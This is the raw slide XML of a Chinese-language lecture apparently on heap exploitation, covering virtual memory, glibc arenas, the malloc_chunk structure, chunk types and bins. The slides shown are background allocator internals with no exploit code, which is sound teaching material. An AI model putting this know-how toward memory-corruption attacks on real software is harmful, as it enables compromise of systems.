              <a:t>code to trap to kernel</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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D8380084-43C7-4294-BC5E-3390350F98AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9319493" y="5651181"/>
            <a:ext cx="14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Kernel code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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7AB23002-1E54-438D-B1DB-D6CB03CEAE08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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堆概述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386889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60937216-F1D1-43AC-AAEC-4905C5B80376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325155" y="2143320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地址以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2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字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>编码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947F7CE-5660-4F2D-A56C-5B637257A7A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2176349" y="2723866"/>
            <a:ext cx="15103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1Byte = 8bits</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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0537596-D144-4E41-B3BC-07E8A80649C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365230" y="3442910"/>
            <a:ext cx="23214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常以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2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进制表示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623D9A4-3A80-4051-9CF5-105A9FE0A0BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727508" y="4069621"/>
            <a:ext cx="1959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0x3c = 0011 1100 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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51F35E4-7815-42DE-89EB-5B5FBC82BBA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="2143320"/>
            <a:ext cx="3499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虚拟内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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用户空间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每个进程一份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4B03993-748E-4B7D-A15C-01966D6DA706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="3107609"/>
            <a:ext cx="3961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虚拟内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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内核空间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所有进程共享一份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9DD882E-986D-4479-BA94-48CEB1C81881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="4071898"/>
            <a:ext cx="6250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虚拟内存 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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mmap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段中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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动态链接库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仅在物理内存中装载一份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0CA4A20-AD38-4B0E-8ED2-B0EA8F0D5E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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进程虚拟地址空间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09743465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5A1F7AC9-3502-47B0-A3C3-3E2980746230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358719" y="3054320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内存分配区，可以理解为堆管理器所持有的内存池</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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堆管理器与用户的内存交易发生于arena中，可以理解为堆管理器向操作系统批发来的有冗余的内存库存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8B07BB0-1C0A-4F04-9311-8E555AF67B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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arena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58A08056-F93F-446F-BCEE-F4BBEAFBFA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2275630" y="1957072"/>
            <a:ext cx="13368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arena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9C94CFC-A477-4D10-B09D-935E70B991FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358719" y="3438931"/>
            <a:ext cx="6096000" cy="646331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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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操作系统 --&gt; 堆管理器 --&gt; 用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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物理内存 --&gt; a r e n a  --&gt; 可用内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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58744434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3C41CFCB-9DDA-4334-A75C-60D9AB162E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5429" y="0"/>
            <a:ext cx="9061142" cy="6795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CC6D244A-9781-420A-B6C5-0238431B279E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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堆概述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59618177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79104FD-1E06-4D2A-A36D-ACF43B416EC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2905957" y="2528788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用户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申请内存的单位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，也是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堆管理器管理内存的基本单位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malloc()返回的指针指向一个chunk的数据区域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E718175-6D55-4E7B-AD94-3DACCF3AD0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4704" y="3709018"/>
            <a:ext cx="5114925" cy="220980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EB5C8C3A-53BA-41DF-ACCF-047C2E2F02AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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D780E74-BD47-4AEE-94DA-FDE51D950314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5107619" y="1410114"/>
            <a:ext cx="169267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chunk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18923952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7AD8D2B1-0D03-4644-9E81-AF8C3F010851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623047" y="2704745"/>
            <a:ext cx="10945905" cy="34163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00FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct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zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk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 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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  INTERNAL_SIZE_T      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prev_size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;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Size of previous chunk (if free).  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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  INTERNAL_SIZE_T      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size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;       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Size in bytes, including overhead. */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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b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altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct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zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd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;         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* double links -- used only if free. */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct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zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bk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b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altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Only used for large blocks: pointer to next larger size.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct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zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd_nextsize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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* double links -- used only if free. */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct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zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bk_nextsize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66E0DED-28C0-4190-866B-690CC29D18A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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D3F76CA-9309-492B-9CE0-550A998FCD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139951" y="1215326"/>
            <a:ext cx="391209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chunk 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的具体实现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2152597644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A0895A9D-698F-4E4A-8F7F-DCE02A15C4F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1658256" y="1807750"/>
            <a:ext cx="27911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chunk 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的分类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EB2A288-ECD9-4911-AA4D-D8666709070C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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56F0253-9DCB-4083-BBEF-7D3779A1472C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572426" y="2825271"/>
            <a:ext cx="1593706" cy="1354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按状态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malloced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free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CF440F0-A79E-4957-A821-9781148596CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462076" y="2779105"/>
            <a:ext cx="1267848" cy="19697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按大小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fast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small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targe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tcache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341D0F3-0A7E-4818-9C3E-99EE2FF5057D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8025868" y="2779105"/>
            <a:ext cx="304878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按特定功能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top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chunk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last remainder chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3726562297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A0895A9D-698F-4E4A-8F7F-DCE02A15C4F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101622" y="1210585"/>
            <a:ext cx="34355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malloced chunk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48BE0E1-D079-4668-AD06-B451592781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2" y="2324100"/>
            <a:ext cx="5114925" cy="220980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649B9D90-6693-4A9C-8038-9E413FD71C52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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F43411A-5AE2-482A-8651-C4678FC8EACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563372" y="1888435"/>
            <a:ext cx="50754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已被分配且填写了相应数据的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chunk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7890310-7009-DFF6-B7BA-CA6EEFCF3E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239" y="2350100"/>
            <a:ext cx="3343693" cy="4155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389804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FEB2A288-ECD9-4911-AA4D-D8666709070C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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9F5152D-27CC-4EDF-A600-10ECA98D22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215723"/>
            <a:ext cx="5114925" cy="325755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D4CCF9D-4DB1-42CF-B51D-E4C003DC1CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630805" y="2844225"/>
            <a:ext cx="23771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free chunk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ACA2784-8576-4AD1-BE2B-DA464BC89194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738885" y="3429000"/>
            <a:ext cx="41610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被释放掉的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malloced chunk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成为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free chunk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31736757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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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9087ADB7-82E4-4784-BC06-A7620EC72F6E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2089" y="574981"/>
            <a:ext cx="3228975" cy="601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A38B9681-3CC0-4FDB-AA68-F96BBF2E2B92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630805" y="2844225"/>
            <a:ext cx="22715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top chunk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5512B09-2395-4BFB-9445-C7809A3217B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738885" y="3429000"/>
            <a:ext cx="41610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arena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从未被使用过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的内存区域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65422654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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550380" y="2844225"/>
            <a:ext cx="45380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last remainder chunk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21A0630-3344-46EB-AEAD-D2B5FE908453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738885" y="3429000"/>
            <a:ext cx="41610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malloc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分割原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chunk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后剩余的部分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B16F5F4-C470-4757-9C39-A0588AC207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3585" y="1843087"/>
            <a:ext cx="3381375" cy="317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752477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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875500" y="919723"/>
            <a:ext cx="36760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Chunk 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的微观结构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21A0630-3344-46EB-AEAD-D2B5FE908453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080005" y="2013225"/>
            <a:ext cx="240055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b="1" dirty="0" err="1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prev_size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty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b="1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size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400" b="1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size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400" b="1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400" b="1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400" b="1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b="1" dirty="0" err="1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fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty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b="1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b="1" dirty="0" err="1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fd_nextsize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty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b="1" dirty="0" err="1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bk_nextsize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty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右大括号 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9619FF95-48F4-4A5F-9474-33B6798860EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="2181255"/>
            <a:ext cx="324946" cy="196185"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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右大括号 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DF8F51-B4E4-44C3-A39E-616B6931EB4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="5097175"/>
            <a:ext cx="324946" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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右大括号 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8C7AA2-FF54-46B6-9231-D18692EE4843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7965614" y="4318001"/>
            <a:ext cx="324946" cy="1363950"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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5CACFF8-4006-4D73-899D-F81E3E8B69CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833150" y="2094681"/>
            <a:ext cx="4095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仅当前一个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chunk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free chunk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时生效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02F6E7D-636C-4F74-8C01-1A9AA3014AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8323065" y="4815310"/>
            <a:ext cx="2504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仅为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free chunk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时生效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13925DF-8456-40FD-B76F-3FE8F255706A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803286" y="5204896"/>
            <a:ext cx="3126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仅为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large free chunk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时生效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右大括号 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B359D0-0531-46FD-947B-5508CE86FCD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987040" y="4712814"/>
            <a:ext cx="324946" cy="196185"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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2FC9CF7-E5EF-435D-BDC5-65D503148105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280282" y="4610916"/>
            <a:ext cx="4844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仅为处于双向链表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bin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中的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free chunk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时生效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右大括号 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEEFB01-E94F-4B54-88EC-40848BC5BD6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="3211420"/>
            <a:ext cx="324946" cy="936279"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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B28F74C-BEF0-4DA7-A89A-ED728E1A5332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833150" y="3494178"/>
            <a:ext cx="22894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占据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size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域的低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3bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18422358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006BF837-3378-47AE-A942-F546580580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485" y="1388112"/>
            <a:ext cx="4379512" cy="444207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8B9D870-1FCD-4E78-BC1E-4319999B05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8229" y="1388112"/>
            <a:ext cx="4598487" cy="4442076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BD18D9CB-62E2-4E71-A7D5-9DDF706A4301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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进程虚拟地址空间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27803962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A0895A9D-698F-4E4A-8F7F-DCE02A15C4F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422902" y="1564009"/>
            <a:ext cx="8467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bin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9882DD6-8AE5-459B-8AC4-DA3D8B7280FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878584" y="2287297"/>
            <a:ext cx="715773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管理 arena 中空闲 chunk 的结构</a:t>
            </a:r>
            <a:r>
